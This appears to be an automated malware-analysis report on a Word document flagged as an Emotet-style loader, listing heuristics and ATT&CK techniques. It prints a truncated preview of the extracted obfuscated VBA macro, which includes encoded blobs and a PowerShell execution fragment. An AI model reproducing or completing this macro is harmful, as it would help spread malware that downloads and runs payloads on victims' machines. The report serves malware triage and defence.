MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function. This macro utilizes CreateObject, a common technique for executing malicious code. The script appears to be obfuscated but is designed to download and execute a second-stage payload, as indicated by the heuristic firings and the presence of a VBA macro.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45100 bytes |
SHA-256: 5785f046925abd60b025e691ab3c2e934145f74ce0f9d57c33c380420131bbcf |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 27 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jqRmnGCwQdiuKj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dSObSWYrjYfim"
Function IGOsjbjN()
On Error Resume Next
Select Case izPUVZ
Case 90923
WbTnMb = Hex(43348 - CSng(95424) - 84299 + ChrW(hYEJrD))
aisHW = jaqjd
End Select
hUqYAOz = ijpHj("BaQA0ADUAZABiADMAZQBmAGQANwBhADgAYQBiADEAYgBiAGYAZAA3ADIAYwA2ADMAZQA2ADAAMAA3AGQAMgA3AGIAMAA0ADkAYQBhAGQAOABiADQAMABkADkAMwAyADMAOQAyAGEANABlADcAZgBkADICZS7k0r", 3, 150)
Select Case jGCamL
Case 4202
GEwiF = Hex(55431 - CSng(98602) - 21384 + ChrW(XYHMKv))
CizPmN = usPIW
End Select
Select Case krkXF
Case 69465
YiSOw = Hex(69889 - CSng(34674) - 15046 + ChrW(rnOlw))
oLVjTa = qESmR
End Select
ZjPivH = ijpHj("nZ6HcJ51Ml", 2, 1)
Select Case joqhSZ
Case 72190
INPpR = Hex(65533 - CSng(89597) - 41194 + ChrW(pVVzDZ))
YRdJo = wJSrb
End Select
Select Case JGnucm
Case 21025
BrwOAK = Hex(15142 - CSng(29570) - 17892 + ChrW(wraHlv))
LnwsSf = iiFsUQ
End Select
TShkNhrdM = ijpHj("sQAGIAZQA0ADIAZgAwAGYAMQA3ADcAMAAxAGQAMwA5ADYAOAA5ADQAMwA4AGYAYQA2AGEAMgA1ADcAMABlADAAZAAxADkANQA1ADgAZgBiADQAZgAwAGEAOQAxADYANwBlADAAYQA1ADgAZQA1ADkAZABhADcANQAyAGIAZgAxAGIAM3q2T", 3, 173)
Select Case IFwJu
Case 63861
URihrf = Hex(71485 - CSng(33073) - 24220 + ChrW(UrAQw))
viLQf = EPvsX
End Select
Select Case zYdhCQ
Case 36975
wsGMX = Hex(38810 - CSng(44693) - 76845 + ChrW(nEiVf))
kTlNfT = cHCzS
End Select
WOYjSwtP = ijpHj("3nB%EA4AGUAMAA5ADYAMgAyADIANwA5ADIANgAwADIAMAAyADIANwBjAGQAMwBmADMANQBiADUA' |cONvertTo-secuRESTrINg -K (165..150)) ) ) ) | &( $PshOmE[bTMW", 6, 130)
Select Case rzpND
Case 72634
JiwiDE = Hex(7307 - CSng(80919) - 97469 + ChrW(QYTisN))
DnCjQ = KZBUwN
End Select
Select Case FGKOKA
Case 69822
AaIVo = Hex(41290 - CSng(26083) - 44341 + ChrW(VmWdN))
rXOqh = jQSMEM
End Select
bvVEiUo = ijpHj("%i7BiADIAMwAzADYAMwBjAGMANgAzAGIAYwA2AGYAYwA3AGIAYQA1ADgAOQBiAGEAMAAzADMAMwAyAGIAZgAwAGMAOQBkADcAMQAzADkANgBmADEAZAA0ADMAYwA2ADgAOQBjADYAMQAzADgAMwA0ADIANAA0AGYANQA2ADcAYwA3ADAAMwA4ADUiF2", 4, 181)
Select Case IXiHGz
Case 92280
ZfwqF = Hex(72998 - CSng(80290) - 75695 + ChrW(jSrwSq))
JCUTKq = jIfOi
End Select
Select Case OzLjrQ
Case 88299
zGAQDp = Hex(69531 - CSng(46167) - 32065 + ChrW(YsXltD))
Owswi = pukjq
End Select
EbbTP = ijpHj("ttquYAyAGIAYQBmAGEAYwBmAGYANQBlADcAYQA1ADAANwBiADcAYwBjADAAZQBjADYAMgA1ADgANwBiADcANwA4AGEAOAAwAGQAZgBlADUAMAA1ADAANQA0ADAAMz7", 6, 119)
Select Case DioYX
Case 62293
daMILZ = Hex(47829 - CSng(10510) - 73328 + ChrW(EcFHUd))
BjQmK = SFtTN
End Select
Select Case bsBbK
Case 37802
jHEHk = Hex(64420 - CSng(24248) - 75614 + ChrW(rhQYBR))
FwHRFz = NPFdU
End Select
DDnaiV = ijpHj("PW8AGsAbgBsAFoANwA4ADAAQwA3AGsAYwBUAHcANgBEAEUAcwB0AFQATwB4AHcAPQA9AHwAYQA3X92o", 3, 72)
Select Case vkiFw
Case 96017
iHiQt = Hex(27181 - CSng(88740) - 70378 + ChrW(drwJB))
fCCFlz = sfDsQi
End Select
Select Case TwkSc
Case 3374
QXbifL = Hex(17297 - CSng(62726) - 77708 + ChrW(BdcZI))
DfbPui = UqcUm
End Select
fFanMtKF = ijpHj("fcAYwA0ADIAMABlAGQAMABjAGEAZgBjADkANQBjADIAMwAxADIANAA0AGMANAAwAGMAZQAwAGYAMgBlADkAZgBlADIAYgAzADYANABjADEAZgAwAGEAYQBjADgANAA5ADYAYgA1ADkANwBmA2wrk8", 3, 142)
Select Case oOTjJ
Case 20694
KMhFZl = Hex(78971 - CSng(2640) - 85358 + ChrW(TlLVj))
BlzhOH = DqWMzF
End Select
Select Case vTnmzY
Case 79943
XNiGH = Hex(22112 - CSng(96142)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.